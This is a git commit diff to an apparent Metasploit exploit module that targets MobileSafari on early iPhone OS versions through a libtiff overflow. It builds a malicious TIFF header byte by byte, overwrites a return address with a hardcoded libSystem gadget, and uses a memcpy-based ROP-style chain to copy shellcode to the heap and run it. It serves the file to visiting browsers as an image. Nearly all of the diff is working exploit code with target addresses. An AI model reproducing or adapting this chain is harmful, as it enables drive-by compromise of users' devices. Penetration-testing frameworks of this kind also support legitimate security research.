Total rewrite using a supah-sweet new return method.
git-svn-id: file:///home/svn/framework3/trunk@5148 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
3050615029
commit
49a54dfb6f
|
@ -41,7 +41,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 300,
|
||||
'Space' => 3800,
|
||||
'BadChars' => "",
|
||||
|
||||
# Multi-threaded applications are not allowed to execve() on OS X
|
||||
|
@ -58,30 +58,16 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MobileSafari iPhone Mac OS X Automatic',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Automatic' => true
|
||||
}
|
||||
],
|
||||
|
||||
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)',
|
||||
[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Stack' => 0x0055a5bc,
|
||||
'Heap' => 0x0006b400,
|
||||
'Memcpy' => 0x3009a1bc,
|
||||
}
|
||||
],
|
||||
[ 'MobileSafari iPhone Mac OS X armle (1.1.1)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Stack' => 0x006f75bc,
|
||||
'Heap' => 0x0006c400,
|
||||
'Memcpy' => 0x3009a1bc,
|
||||
|
||||
# Scratch space for our shellcode and stack
|
||||
'Heap' => 0x00802000,
|
||||
|
||||
# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
|
||||
'Magic' => 0x300d562c,
|
||||
}
|
||||
],
|
||||
],
|
||||
|
@ -92,20 +78,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, req)
|
||||
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
# Grab reference to the target
|
||||
t = target
|
||||
if(target['Automatic'])
|
||||
|
||||
t = self.targets[1]
|
||||
case req.headers['User-Agent']
|
||||
when /iPhone.*420\.1/
|
||||
t = self.targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
|
||||
|
@ -116,49 +96,82 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
|||
|
||||
def generate_tiff(code, targ)
|
||||
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
|
||||
|
||||
print_status("Opening file...")
|
||||
data = File.read(path, File.size(path))
|
||||
print_status("Done...")
|
||||
|
||||
#
|
||||
# The basic idea:
|
||||
#
|
||||
# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
|
||||
# This loads r0-r3 and pc from the stack, jumping to the address in pc
|
||||
# The address in pc is the real address of memcpy(), which takes
|
||||
# parameters via the r0-r3 registers. We memcpy the stack address
|
||||
# (which seems to be static across all versions) to an unused page
|
||||
# on the heap. Finally, we patch up a local variable (r6) and then
|
||||
# return back to the heap location we copied the stack to.
|
||||
# This is a TIFF file, we have a huge range of evasion
|
||||
# capabilities, but for now, we don't use them.
|
||||
# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
|
||||
#
|
||||
|
||||
dst_ptr = targ['Heap']
|
||||
src_ptr = targ['Stack']
|
||||
shl_len = 168 + payload.encoded.length
|
||||
|
||||
# Still some wonky characters in here, this doesn't work with alpha/english/etc
|
||||
patt = pattern_create(shl_len)
|
||||
|
||||
# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
|
||||
patt[120,4] = [0x300df800].pack("V")
|
||||
dlen = 0x1000
|
||||
data =
|
||||
"\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
|
||||
"\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
|
||||
"\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
|
||||
"\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
|
||||
"\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
|
||||
"\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
|
||||
"\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
|
||||
"\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
|
||||
[dlen].pack("V") +
|
||||
"\x84\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
|
||||
# memcpy(r0, r1, r2)
|
||||
patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[124,4] = [dst_ptr].pack("V") # dst
|
||||
patt[128,4] = [src_ptr].pack("V") # src
|
||||
patt[132,4] = [shl_len].pack("V") # len
|
||||
|
||||
# fix up r6 to bypass an exception
|
||||
patt[112,4] = [dst_ptr + shl_len].pack("V")
|
||||
# Randomize the bajeezus out of our data
|
||||
patt = rand_text(dlen)
|
||||
|
||||
# Return back to our copied stack data
|
||||
patt[164,4] = [dst_ptr + 168].pack("V")
|
||||
# Were going to candy mountain!
|
||||
patt[120, 4] = [target['Magic']].pack("V")
|
||||
|
||||
# Stick our shellcode into the buffer
|
||||
patt[168, payload.encoded.length] = payload.encoded
|
||||
# >> add r0, r4, #0x30
|
||||
patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
|
||||
|
||||
# Candy mountain, Charlie!
|
||||
# >> mov r1, sp
|
||||
|
||||
# It will be an adventure!
|
||||
# >> mov r2, r8
|
||||
patt[ 92, 4] = [ patt.length ].pack("V")
|
||||
|
||||
# Its a magic leoplurodon!
|
||||
# It has spoken!
|
||||
# It has shown us the way!
|
||||
# >> bl _memcpy
|
||||
|
||||
# Its just over this bridge, Charlie!
|
||||
# This magical bridge!
|
||||
# >> ldr r3, [r4, #32]
|
||||
# >> ldrt r3, [pc], r3, lsr #30
|
||||
# >> str r3, [r4, #32]
|
||||
# >> ldr r3, [r4, #36]
|
||||
# >> ldrt r3, [pc], r3, lsr #30
|
||||
# >> str r3, [r4, #36]
|
||||
# >> ldr r3, [r4, #40]
|
||||
# >> ldrt r3, [pc], r3, lsr #30
|
||||
# >> str r3, [r4, #40]
|
||||
# >> ldr r3, [r4, #44]
|
||||
# >> ldrt r3, [pc], r3, lsr #30
|
||||
# >> str r3, [r4, #44]
|
||||
|
||||
# We made it to candy mountain!
|
||||
# Go inside Charlie!
|
||||
# sub sp, r7, #0x14
|
||||
patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
|
||||
|
||||
# Goodbye Charlie!
|
||||
# ;; targ['Heap'] + 0x48 becomes the stack pointer
|
||||
# >> ldmia sp!, {r8, r10}
|
||||
|
||||
# Hey, what the...!
|
||||
# >> ldmia sp!, {r4, r5, r6, r7, pc}
|
||||
|
||||
# Return back to the copied heap data
|
||||
patt[192, 4] = [ targ['Heap'] + 196 ].pack("V")
|
||||
|
||||
# Insert our actual shellcode at heap location + 196
|
||||
patt[196, payload.encoded.length] = payload.encoded
|
||||
|
||||
data << patt
|
||||
data
|
||||
|
|
Loading…
Reference in New Issue